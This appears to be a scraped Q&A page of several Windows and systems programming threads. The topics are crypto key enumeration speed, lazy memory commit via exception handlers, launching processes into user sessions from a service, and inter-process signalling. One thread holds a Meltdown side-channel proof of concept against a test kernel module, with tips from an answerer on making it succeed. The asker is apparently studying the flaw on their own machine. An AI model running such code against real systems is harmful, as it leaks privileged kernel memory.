Slow key enumeration in a machine RSA key container

Slow key enumeration in a machine RSA key container - winapi

I need to enumerate keys in the machine key container. Although this is generally an optional provider function, both MS_STRONG_PROV and MS_ENH_RSA_AES_PROV support it. I do not think I am doing anything wrong or unusual: first, acquiring a context handle with CryptAcquireContext(... CRYPT_MACHINE_KEYSET | CRYPT_VERIFYCONTEXT ...), then calling CryptGetProvParam(... PP_ENUMCONTAINERS ...) repeatedly until the enumeration is exhausted:
void enum_keys(HCRYPTPROV hprov) {
BYTE buf[1024]; // Max key name length we support.
for (DWORD first_next = CRYPT_FIRST; 1; first_next = CRYPT_NEXT) {
DWORD buf_len = sizeof buf;
if (!CryptGetProvParam(hprov, PP_ENUMCONTAINERS, buf, &buf_len, first_next)) {
if (GetLastError() == ERROR_NO_MORE_ITEMS) break;
else exit(1);
}
}
}
void do_benchmark(DWORD enum_flags) {
enum_flags |= CRYPT_VERIFYCONTEXT;
HCRYPTPROV hprov;
if (!CryptAcquireContext(&hprov, NULL, MS_ENH_RSA_AES_PROV_A,
PROV_RSA_AES, enum_flags))
exit(1);
int K = 100;
ClockIn(); // Pseudocode
for (int i = 0; i < K; ++i)
enum_keys (hprov);
ClockOut(); // Pseudocode.
printf(" %f ms per pass\n", TimeElapsed() / K);
CryptReleaseContext(hprov, 0);
}
void main() {
printf("--- User key store access performance test... ");
do_benchmark(0);
printf("--- Machine key store access performance test... ");
do_benchmark(CRYPT_MACHINE_KEYSET);
}
To benchmark the enumeration, I am leaving context acquisition and release out of the loop, and clocking only the enumeration, and repeat the enumeration 100 times. What I am noticing is that the enumeration is significantly slower for a normal user than an administrator. When I run the test as myself (member of Administrators with UAC enabled), I am getting
--- User key store access performance test... 3.317211 ms per pass
--- Machine key store access performance test... 78.051593 ms per pass
However, when I run the same test from an elevated prompt, the result is dramatically different:
--- User key store access performance test... 3.279580 ms per pass
--- Machine key store access performance test... 1.499939 ms per pass
Under the hood, more keys are reported to an admin than to non-admin user, but that's expected and normal. What I do not understand is why the enumeration is ~40 times slower for a non-admin user. Any pointers?
I am putting the full source of my test into a Gist. The test is run on a pretty generic Windows 7 machine without any crypto hardware.
Added: on a Server 2012 virtual machine on a Server 2012 HyperV host, the slowdown factor was even greater, over 130: 440 vs 3.3 ms. 440ms is a performance issue for me, indeed.

Could it be related to this issue from Microsoft:
You experience poor performance when you call the CryptAcquireContext function in Windows Server 2008 R2 or in Windows 7
From the issue:
"This issue occurs because of a change in the CryptAcquireContext function in Windows Server 2008 R2 and in Windows 7.
This change checks whether the function runs in a domain environment. However, the process is time-consuming and causes the increased running time of the CryptAcquireContext function."

Related

Simulating (lazy) NAND memory on Windows

I'm running a firmware simulation in a DLL which has simulated NAND (256MB or 1GB). I want to avoid allocating memory for this on the heap and instead allocate using virtual memory.
The memory initially needs to be cleared to 0xFF (like NAND is). However I don't want to pay for that initialization (nor commit un-accessed pages). So ideally it should only allocate upon access. And I do not need to retain the data following exit of the simulation.
Initial ideas are
VirtualAlloc. Not sure but thinking perhaps could use guard page and then trap the exception on first access. Not sure its ideal that a DLL handles such SEH exceptions? Or is there a better way?
Create a big file that's initialized to 0xFF. Then map view of file with copy-on-write.
Anyone know if it is possible to create a file with a callback for providing the initial data?
Think probably 1) the way to go but wondering if that's really the best option.
Edit:
3) I've come up with another method that can avoid exception handler and also avoids creating a huge file:
Create a file that is same size as dwAllocationGranularity (64KiB typically). Fill with 0xFF. Then create multiple copy-on-write views of that in contiguous memory using MapViewOfFileEx + FILE_MAP_COPY (after an initial VirtualAlloc/VirtualFree to get a suitable base address that we can hope to allocate juxtapositioned views). Need to test this a bit more fully - slight concern about potential thread races.. I'm ony actually using a single thread but the CRT does start a few too.
This means that any code that only reads the virtual NAND also does not result in all pages getting committed.

yes, basically 1 is best solution. only i be do next changes - use VEH instead SEH - SEH handler will be called only if you access memory inside it, when in case VEH - access can be ai any context and thread. and instead use guard page, i be initial only reserve region of memory without real allocation. so any access to memory region lead to exception, you handle it in VEH - commit memory and fill with 0xFF pattern. demo code
PVOID g_NandBegin;
SIZE_T g_NandSize = 0x1000000;
LONG NTAPI Vex(::PEXCEPTION_POINTERS ExceptionInfo)
{
::PEXCEPTION_RECORD ExceptionRecord = ExceptionInfo->ExceptionRecord;
if (ExceptionRecord->ExceptionCode == STATUS_ACCESS_VIOLATION &&
ExceptionRecord->NumberParameters > 1)
{
PVOID pv = (PVOID)ExceptionRecord->ExceptionInformation[1];
if ((ULONG_PTR)pv - (ULONG_PTR)g_NandBegin < g_NandSize)
{
SIZE_T RegionSize = 1;
if (0 <= NtAllocateVirtualMemory(NtCurrentProcess(), &pv, 0, &RegionSize, MEM_COMMIT, PAGE_READWRITE))
{
RtlFillMemoryUlong(pv, RegionSize, MAXULONG);
return EXCEPTION_CONTINUE_EXECUTION;
}
}
}
return EXCEPTION_CONTINUE_SEARCH;
}
void dc()
{
if (PVOID pv = AddVectoredExceptionHandler(TRUE, Vex))
{
if (g_NandBegin = VirtualAlloc(0, g_NandSize, MEM_RESERVE, PAGE_READWRITE))
{
ULONG seed = ~GetTickCount();
int n = 0x100;
do
{
if (*(UCHAR*)((PBYTE)g_NandBegin + (((ULONG64)RtlRandomEx(&seed) * g_NandSize) >> 32)) != 0xFF)
{
__debugbreak();
}
} while (--n);
VirtualFree(g_NandBegin, 0, MEM_RELEASE);
}
RemoveVectoredExceptionHandler(pv);
}
}

Encouraging the CPU to perform out of order execution for a Meltdown test

I am attempting to exploit the meltdown security flaw on Ubuntu 16.04, with an unpatched kernel 4.8.0-36 on an Intel Core-i5 4300M CPU.
First, I am storing the secret data at an address in kernel space using a kernel module :
static __init int initialize_proc(void){
char* key_val = "abcd";
printk("Secret data address = %p\n", key_val);
printk("Value at %p = %s\n", key_val, key_val);
}
The printk statement gives me the address of the secret data.
Mar 30 07:00:49 VM kernel: [62055.121882] Secret data address = fa2ef024
Mar 30 07:00:49 VM kernel: [62055.121883] Value at fa2ef024 = abcd
I then attempt to access the data at this location and in the next instruction use it to cache an element of an array.
// Out of order execution
int meltdown(unsigned long kernel_addr){
char data = *(char*) kernel_addr; //Raises exception
array[data*4096+DELTA] += 10; // <----- Execute out of order
}
I am expecting the CPU to go ahead and cache the array element at index (data*4096 +DELTA) when performing out of order execution. After this, a bounds check is performed and SIGSEGV is thrown.
I handle the SIGSEGV and then time the access to the array elements to determine which one has been cached:
void attackChannel_x86(){
register uint64_t time1, time2;
volatile uint8_t *addr;
int min = 10000;
int temp, i, k;
for(i=0;i<256;i++){
time1 = __rdtscp(&temp); //timestamp before memory access
temp = array[i*4096 + DELTA];
time2 = __rdtscp(&temp) - time1; // change in timestamp after the access
if(time2<=min){
min = time2;
k=i;
}
}
printf("array[%d*4096+DELTA]\n", k);
}
Since the value in data is ‘a’, I am expecting the result to be array[97*4096 + DELTA] since ASCII value of ‘a’ is 97.
However, this is not working and I am getting random outputs.
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[241*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[78*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[146*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[115*4096+DELTA]
The possible reasons I could think of are:
The instruction caching the array element is not getting executed
out of order.
Out of order execution is occurring but the cache is being flushed.
I have misunderstood the mapping of memory in the kernel module and the address I'm using is incorrect
Since the system is vulnerable to meltdown, I am certain that rules out the 2nd possibility.
Hence, my question is: Why is out of order execution not working here? Are there any options/flags that “encourage” the CPU to execute out of order ?
Solutions I’ve already tried:
Using clock_gettime instead of rdtscp for timing memory access.
void attackChannel(){
int i, k, temp;
uint64_t diff;
volatile uint8_t *addr;
double min = 10000000;
struct timespec start, end;
for(i=0;i<256;i++){
addr = &array[i*4096 + DELTA];
clock_gettime(CLOCK_MONOTONIC, &start);
temp = *addr;
clock_gettime(CLOCK_MONOTONIC, &end);
diff = end.tv_nsec - start.tv_nsec;
if(diff<=min){
min = diff;
k=i;
}
}
if(min<600)
printf("Accessed element : array[%d*4096+DELTA]\n", k);
}
Keeping the arithmetic units “busy” by executing a loop (see meltdown_busy_loop)
void meltdown_busy_loop(unsigned long kernel_addr){
char kernel_data;
asm volatile(
".rept 1000;"
"add $0x01, %%eax;"
".endr;"
:
:
:"eax"
);
kernel_data = *(char*)kernel_addr;
array[kernel_data*4096 + DELTA] +=10;
}
Using procfs to force the data into the cache before performing a time attack (see meltdown)
int meltdown(unsigned long kernel_addr){
// Cache the data to improve success
int fd = open("/proc/my_secret_key", O_RDONLY);
if(fd<0){
perror("open");
return -1;
}
int ret = pread(fd, NULL, 0, 0); //Data is cached
char data = *(char*) kernel_addr; //Raises exception
array[data*4096+DELTA] += 10; // <----- Out of order
}
For anyone interested in setting it up, here is the link to the github repo
For the sake of completeness, I am appending the main function and error handling code below:
void flushChannel(){
int i;
for(i=0;i<256;i++) array[i*4096 + DELTA] = 1;
for(i=0;i<256;i++) _mm_clflush(&array[i*4096 + DELTA]);
}
void catch_segv(){
siglongjmp(jbuf, 1);
}
int main(){
unsigned long kernel_addr = 0xfa2ef024;
signal(SIGSEGV, catch_segv);
if(sigsetjmp(jbuf, 1)==0)
{
// meltdown(kernel_addr);
meltdown_busy_loop(kernel_addr);
}
else{
printf("Memory Access Violation\n");
}
attackChannel_x86();
}

I think the data needs to be in L1d for Meltdown to work, and attempting to read it only through a TLB / page-table entry that doesn't have privileges won't bring it into L1d.
http://blog.stuffedcow.net/2018/05/meltdown-microarchitecture/
When any kind of bad outcome occurs (page fault, load from a non-speculative memory type, page accessed bit = 0), none of the processors initiate an off-core L2 request to fetch the data.
Unless there's something I'm missing, I think data is only vulnerable to Meltdown when something that is allowed to read it has brought it into L1d. (Directly or via HW prefetch.) I don't think repeated Meltdown attacks can bring data from RAM into L1d.
Try adding a system call or something to your module that uses READ_ONCE() on your secret data (or manually write *(volatile int*)&data; or just make it volatile so you can easily touch it) to bring it into cache from a context that does have privileges for that PTE.
Also: add $0x01, %%eax is a poor choice for delaying retirement. It's only 1 clock cycle of delay per uop, so OoO exec only has ~64 cycles from when the first instruction after the ADDs can enter the scheduler (RS) and run, before it chews through the adds and the faulting loads reach retirement.
At least use imul (3c latency), or better use xorps %xmm0,%xmm0 / repeated sqrtpd %xmm0,%xmm0 (single uop, 16 cycle latency on your Haswell.) https://agner.org/optimize/.

CreateProcessAsUser from service with proper PEB and ACL

I have read tons of SO questions on this matter, but I didn't find a real definitive guide for doing this the right way.
My goal is to enumerate [disconnected and active] user console sessions and start a process in each one of them. Every user session process requires at least these rights in its DACL :
Token access rights :
TOKEN_QUERY (for GetTokenInformation())
TOKEN_QUERY_SOURCE (for GetTokenInformation())
Process access rights :
PROCESS_QUERY_INFORMATION (for OpenProcessToken())
PROCESS_QUERY_INFORMATION | PROCESS_VM_READ (for GetModuleFileNameEx())
PROCESS_VM_OPERATION (used with GetTokenInformation() to get other processes' username later with LookupAccountSid())
But as you can read here (at the bottom) : "Windows Vista introduces protected processes to enhance support for Digital Rights Management. The system restricts access to protected processes and the threads of protected processes."
So I thought maybe only with PROCESS_QUERY_LIMITED_INFORMATION I can get some information about other processes. I tried QueryFullProcessImageName() for elevated processes starting from Vista (see Giori's answer) but it doesn't work anymore as it seems.
Solution : CreateProcessAs_LOCAL_SYSTEM using a duplicated token of the Windows service.
Problem : The spawned processes should have the respective logged on user's environment variables set to be able to locate network printers and mapped drives among other things. But if I use the service's token I inherit its PEB and I can't even translate the mapped drives to their UNC paths.
So I started looking for ways to "elevate" the process and bypassing the UAC prompt, I tried :
Enabling some privileges like SE_DEBUG_PRIVILEGE in the token using AdjustTokenPrivileges() (does not work if the token does not have those privileges, verification can be done first using LookUpPrivilegeValue())
using the token from winlogon.exe. (does not work)
Changing the DACL (source code) (didn't work)
The steps I'm following are :
Enumerate sessions using WTSEnumerateSessions()
Get the token (two choices) :
SYSTEM token : OpenProcessToken(GetCurrentProcess(),TokenAccessLevels.MaximumAllowed, out hProcessToken)
User token : WTSQueryUserToken(sessionId, out hUserToken)
Duplicate the token using DuplicateTokenEx()
LookUpPrivilegeValue() / AdjustTokenPrivileges() (useless ?)
CreateEnvironmentBlock()
CreateProccessAsUser(), flags : NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT, Startup info's desktop : "WinSta0\Default"
Change process DACL (see link above, useless ?)
Dispose/Clean : destroy PEB created, close opened handles and free memory.
My question : how to grant the process created using CreateProccessAsUser() from a Windows Service running under LOCAL_SYSTEM account enough privileges/rights to get information on other processes (from other sessions; of other users and different integrity levels) without losing the user's environment variables ?

You're confused about a number of things.
Every user session process requires at least these rights in its DACL
The process DACL controls access to that process, it does not determine what access that process has. The security token for the process determines access rights.
Windows Vista introduces protected processes to enhance support for Digital Rights Management.
It seems clear that you haven't gotten far enough to worry about protected processes yet. Get it to work for ordinary processes first!
The spawned processes should have the respective logged on user's environment variables set to be able to locate network printers and mapped drives among other things.
Network printers and mapped drives have nothing to do with environment variables. I think what you're trying to do is to put the new process into the user's logon session, that's what controls network drive mappings and the like.
how to grant the process created using CreateProccessAsUser() [...] enough privileges/rights to get information on other processes (from other sessions; of other users and different integrity levels) without losing the user's environment variables ?
Don't. This would violate the integrity of the security model.
Instead, enumerate and query processes from the system service, and pass only whatever information is necessary to the user session processes, using shared memory (look up "file mapping object" in MSDN) or another suitable IPC mechanism.

I know that this has been asked a while ago. Since I happened to have been doing the same, below is the working pseudo-code.
First, how to run a process in a user session from a service:
//IMPORTANT: All error checks are omitted for brevity!
// Each of the lines of code below MUST be
// checked for possible errors!!!
//INFO: The following pseudo-code is intended to run
// from the Windows local service.
DWORD dwSessionID; //Session ID to run your user process in
//Get token for the session ID
HANDLE hToken;
WTSQueryUserToken(dwSessionID, &hToken);
//Duplicate this token
HANDLE hToken2;
DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hToken2);
PSID gpSidMIL_High = NULL;
if(you_want_to_change_integrity_level_for_user_process)
{
if(!Windows_XP)
{
//For example, create "high" mandaroty integrity level SID
::ConvertStringSidToSid(L"S-1-16-12288", &gpSidMIL_High);
TOKEN_MANDATORY_LABEL tml = {0};
tml.Label.Attributes = SE_GROUP_INTEGRITY;
tml.Label.Sid = gpSidMIL_High;
SetTokenInformation(hToken2, TokenIntegrityLevel, &tml,
sizeof(TOKEN_MANDATORY_LABEL) + ::GetSidLengthRequired(1));
}
}
//Copy environment strings
LPVOID pEnvBlock = NULL;
CreateEnvironmentBlock(&pEnvBlock, hToken2, FALSE);
//Initialize the STARTUPINFO structure.
// Specify that the process runs in the interactive desktop.
STARTUPINFO si;
ZeroMemory(&si, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
si.lpDesktop = _T("winsta0\\default");
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
//Create non-const buffer
TCHAR pBuffCmdLine[MAX_PATH];
pBuffCmdLine[0] = 0;
//Copy process path & parameters to the non-constant buffer
StringCchCopy(pBuffCmdLine, MAX_PATH, L"\"C:\\Program Files (x86)\\Company\\Brand\\process.exe\" -parameter");
//Impersonate the user
ImpersonateLoggedOnUser(hToken2);
//Launch the process in the user session.
bResult = CreateProcessAsUser(
hToken2, // client's access token
L"C:\\Program Files (x86)\\Company\\Brand\\process.exe", // file to execute
pBuffCmdLine[0] != 0 ? pBuffCmdLine : NULL, // command line
NULL, // pointer to process SECURITY_ATTRIBUTES
NULL, // pointer to thread SECURITY_ATTRIBUTES
FALSE, // handles are not inheritable
NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT, // creation flags
pEnvBlock, // pointer to new environment block
NULL, // name of current directory
&si, // pointer to STARTUPINFO structure
&pi // receives information about new process
);
//Get last error
nOSError = GetLastError();
//Revert to self
RevertToSelf();
//At this point you may want to wait for the user process to start, etc.
//using its handle in `pi.hProcess`
...
//Otherwise, close handles
if(pi.hProcess)
CloseHandle(pi.hProcess);
if(pi.hThread)
CloseHandle(pi.hThread);
//Clean-up
if(pEnvBlock)
DestroyEnvironmentBlock(pEnvBlock);
CloseHandle(hToken2);
CloseHandle(hToken);
if(gpSidMIL_High)
::LocalFree(gpSidMIL_High);
If you need to run your process in all sessions with a logged in interactive user, you can run the method I gave above for the sessions that you can obtain from the following enumeration:
//Enumerate all sessions
WTS_SESSION_INFO* pWSI = NULL;
DWORD nCntWSI = 0;
if(WTSEnumerateSessions(WTS_CURRENT_SERVER_HANDLE, NULL, 1, &pWSI, &nCntWSI))
{
//Go through all sessions
for(DWORD i = 0; i < nCntWSI; i++)
{
//To select logged in interactive user session,
//try to get its name. If you get something, then
//this session has a user logged in to...
LPTSTR pUserName = NULL;
DWORD dwcbSzUserName = 0;
if(WTSQuerySessionInformation(WTS_CURRENT_SERVER_HANDLE,
pWSI[i].SessionId,
WTSUserName, &pUserName, &dwcbSzUserName) &&
pUserName &&
dwcbSzUserName >= sizeof(TCHAR) &&
pUserName[0] != 0)
{
//Use my method above to run your user process
// in this session.
DWORD dwSessionID = pWSI[i].SessionId;
}
//Free mem
if(pUserName)
WTSFreeMemory(pUserName);
}
//Free mem
WTSFreeMemory(pWSI);
}

How to make a fast context switch from one process to another?

I need to run unsafe native code on a sandbox process and I need to reduce bottleneck of process switch. Both processes (controller and sandbox) shares two auto-reset events and a coherent view of a mapped file (shared memory) that is used for communication.
To make this article smaller, I removed initializations from sample code, but the events are created by the controller, duplicated using DuplicateHandle, and then sent to sandbox process prior to work.
Controller source:
void inSandbox(HANDLE hNewRequest, HANDLE hAnswer, volatile int *shared) {
int before = *shared;
for (int i = 0; i < 100000; ++i) {
// Notify sandbox of a new request and wait for answer.
SignalObjectAndWait(hNewRequest, hAnswer, INFINITE, FALSE);
}
assert(*shared == before + 100000);
}
void inProcess(volatile int *shared) {
int before = *shared;
for (int i = 0; i < 100000; ++i) {
newRequest(shared);
}
assert(*shared == before + 100000);
}
void newRequest(volatile int *shared) {
// In this test, the request only increments an int.
(*shared)++;
}
Sandbox source:
void sandboxLoop(HANDLE hNewRequest, HANDLE hAnswer, volatile int *shared) {
// Wait for the first request from controller.
assert(WaitForSingleObject(hNewRequest, INFINITE) == WAIT_OBJECT_0);
for(;;) {
// Perform request.
newRequest(shared);
// Notify controller and wait for next request.
SignalObjectAndWait(hAnswer, hNewRequest, INFINITE, FALSE);
}
}
void newRequest(volatile int *shared) {
// In this test, the request only increments an int.
(*shared)++;
}
Measurements:
inSandbox() - 550ms, ~350k context switches, 42% CPU (25% kernel, 17% user).
inProcess() - 20ms, ~2k context switches, 55% CPU (2% kernel, 53% user).
The machine is Windows 7 Pro, Core 2 Duo P9700 with 8gb of memory.
An interesting fact is that sandbox solution uses 42% of CPU vs 55% of in-process solution. Another noteworthy fact is that sandbox solution contains 350k context switches, which is much more than the 200k context switches that we can infer from source code.
I need to know if there's a way to reduce the overhead of transfer control to another process. I already tried to use pipes instead of events, and it was much worse. I also tried to use no event at all, by making the sandbox call SuspendThread(GetCurrentThread()) and making the controller call ResumeThread(hSandboxThread) on every request, but the performance was similar to using events.
If you have a solution that uses assembly (like performing a manual context switch) or Windows Driver Kit, please let me know as well. I don't mind having to install a driver to make this faster.
I heard that Google Native Client does something similar, but I only found this documentation. If you have more information, please let me know.

The first thing to try is raising the priority of the waiting thread. This should reduce the number of extraneous context switches.
Alternatively, since you're on a 2-core system, using spinlocks instead of events would make your code much much faster, at the cost of system performance and power consumption:
void inSandbox(volatile int *lock, volatile int *shared)
{
int i, before = *shared;
for (i = 0; i < 100000; ++i) {
*lock = 1;
while (*lock != 0) { }
}
assert(*shared == before + 100000);
}
void newRequest(volatile int *shared) {
// In this test, the request only increments an int.
(*shared)++;
}
void sandboxLoop(volatile int *lock, volatile int * shared)
{
for(;;) {
while (*lock != 1) { }
newRequest(shared);
*lock = 0;
}
}
In this scenario, you should probably set thread affinity masks and/or lower the priority of the spinning thread so that it doesn't compete with the busy thread for CPU time.
Ideally, you'd use a hybrid approach. When one side is going to be busy for a while, let the other side wait on an event so that other processes can get some CPU time. You could trigger the event a little ahead of time (using the spinlock to retain synchronization) so that the other thread will be ready when you are.

Does CancelSynchronousIo work with WNetAddConnection2?

I'm trying and failing to cancel a call to WNetAddConnection2 with CancelSynchronousIo.
The call to CancelSynchronousIo succeeds but nothing is actually cancelled.
I'm using a 32-bit console app running on Windows 7 x64.
Has anyone done this successfully? Am I doing something dumb? Here's a sample console app (which needs to be linked with mpr.lib):
DWORD WINAPI ConnectThread(LPVOID param)
{
NETRESOURCE nr;
memset(&nr, 0, sizeof(nr));
nr.dwType = RESOURCETYPE_ANY;
nr.lpRemoteName = L"\\\\8.8.8.8\\bog";
// result is ERROR_BAD_NETPATH (i.e. the call isn't cancelled)
DWORD result = WNetAddConnection2(&nr, L"pass", L"user", CONNECT_TEMPORARY);
return 0;
}
int _tmain(int argc, _TCHAR* argv[])
{
// Create a new thread to run WNetAddConnection2
HANDLE hThread = CreateThread(0, 0, ConnectThread, 0, 0, 0);
if (!hThread)
return 1;
// Retry the cancel until it fails; keep track of how often
int count = 0;
BOOL ok;
do
{
// Sleep to give the thread a chance to start
Sleep(1000);
ok = CancelSynchronousIo(hThread);
++count;
}
while (ok);
// count will equal two here (i.e. one successful cancellation and
// one failed cancellation)
// err is ERROR_NOT_FOUND (i.e. nothing to cancel) which makes
// sense for the second call
DWORD err = GetLastError();
// Wait for the thread to finish; this takes ages (i.e. the
// WNetAddConnection2 call is not cancelled)
WaitForSingleObject(hThread, INFINITE);
return 0;
}

According to Larry Osterman (I hope he doesn't mind me quoting him): "The question was answered in the comments: wnetaddconnection2 isn’t a simple IOCTL call." So the answer (unfortunately) is no.

First, WNetAddConnection2 is system-wide, not per-process. This is important, as calling WNetAddConnection2 many times can wreck system stability - particularly with explorer.
I use WNetGetResourceInformation first to check if the connection already exists before even thinking of calling it - my process may have previously run and then shutdown. The connection may still exist. When my Windows service(s) needs to add such a connection I use a nasty little trick in order to prevent these totally non-abortable API's from stalling my own service shutdown.
The trick is to run these calls in a separate process: they are system-wide, after all. You can normally wait for the process to complete as if you called the functions yourself but you can terminate the process and give up waiting if you need to abort in order to shutdown.
Sadly, however, certain Windows resources, such as named pipe handles and handles to files open on remote computers, can take about 16 seconds to close following failure or shutdown of a remote machine. CancelSynchronousIo does not seem to even help with those but will likely add additional long delay.

Develop Reference

ruby bash windows laravel spring algorithm oracle macos go visual-studio